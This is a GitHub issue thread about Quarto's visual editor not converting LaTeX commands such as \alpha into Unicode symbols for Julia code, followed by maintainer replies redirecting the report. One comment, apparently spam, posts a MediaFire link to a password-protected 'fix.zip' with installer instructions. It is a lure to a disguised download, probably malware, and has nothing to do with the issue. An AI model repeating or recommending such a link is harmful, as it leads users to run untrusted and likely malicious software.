### ISSUE TITLE
In visual mode, latex commands are not replaced by the symbol

### ISSUE THREAD

**Issue by tpoisot** [quarto-dev/quarto-cli#10640]
### Bug description

Julia allows the use of unicode characters to note e.g. greek letters, symbols, etc. When editing code in visual mode, `\alpha<Tab>` turns into `    \alpha` as opposed to `α`, which is the behavior in source mode when the Julia VS Code package is installed.

### Steps to reproduce

Open a quarto document in visual mode with the Julia VS Code package, write any symbol that should be auto-replaced, press tab

### Expected behavior

The latex command turns into the unicode character

### Actual behavior

The current line is indented by one tab

### Your environment

- IDE: VS Code 1.92.2
- Quarto: 1.5.56

### Quarto check output

```bash
Quarto 1.5.56
[✓] Checking versions of quarto binary dependencies...
      Pandoc version 3.2.0: OK
      Dart Sass version 1.70.0: OK
      Deno version 1.41.0: OK
      Typst version 0.11.0: OK
[✓] Checking versions of quarto dependencies......OK
[✓] Checking Quarto installation......OK
      Version: 1.5.56
      Path: /home/tpoisot/opt/quarto-1.5.56/bin

[✓] Checking tools....................OK
      TinyTeX: v2023.09
      Chromium: (not installed)

[✓] Checking LaTeX....................OK
      Using: TinyTex
      Path: /home/tpoisot/.TinyTeX/bin/x86_64-linux
      Version: 2023

[✓] Checking basic markdown render....OK

[✓] Checking Python 3 installation....OK
      Version: 3.11.9
      Path: /usr/bin/python3
      Jupyter: 5.7.2
      Kernels: julia-1.10, python3, python3.11

[✓] Checking Jupyter engine render....OK

[✓] Checking R installation...........OK
      Version: 4.4.1
      Path: /usr/lib64/R
      LibPaths:
        - /usr/lib64/R/library
      knitr: (None)
      rmarkdown: (None)

      The knitr package is not available in this R installation.
      Install with install.packages("knitr")
      The rmarkdown package is not available in this R installation.
      Install with install.packages("rmarkdown")
```

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mcanouil** [comment]
Please could you report this (if not already reported) on the appropriate repository which is https://github.com/quarto-dev/quarto
Thank you!

**Comment by tpoisot** [comment]
Will do - the Julia VS Code package is the... well, the Julia package for VS code that, in parts, expands latex code into unicode. Pretty standard for anyone using Julia within VS Code.

**Comment by mcanouil** [comment]
Sorry, I don't understand. Your issue is with Quarto or this Julia VSCode extension?
Visual editor has nothing to do with Julia VScode extension.

**Comment by cscheid** [comment]
> This is true in source mode, but this is NOT true in Quarto visual editor when editing a code block.

That's not going to be something we can fix. The visual editor is _not_ a regular text editor in VS Code, and so you don't get most (any?) of the text extensions from VS Code.

**Comment by tpoisot** [comment]
I just checked and the issue also happens in source mode. Anyways, a similar issue has been open for a year or so on the other repo, so I'll follow up there. Thanks!
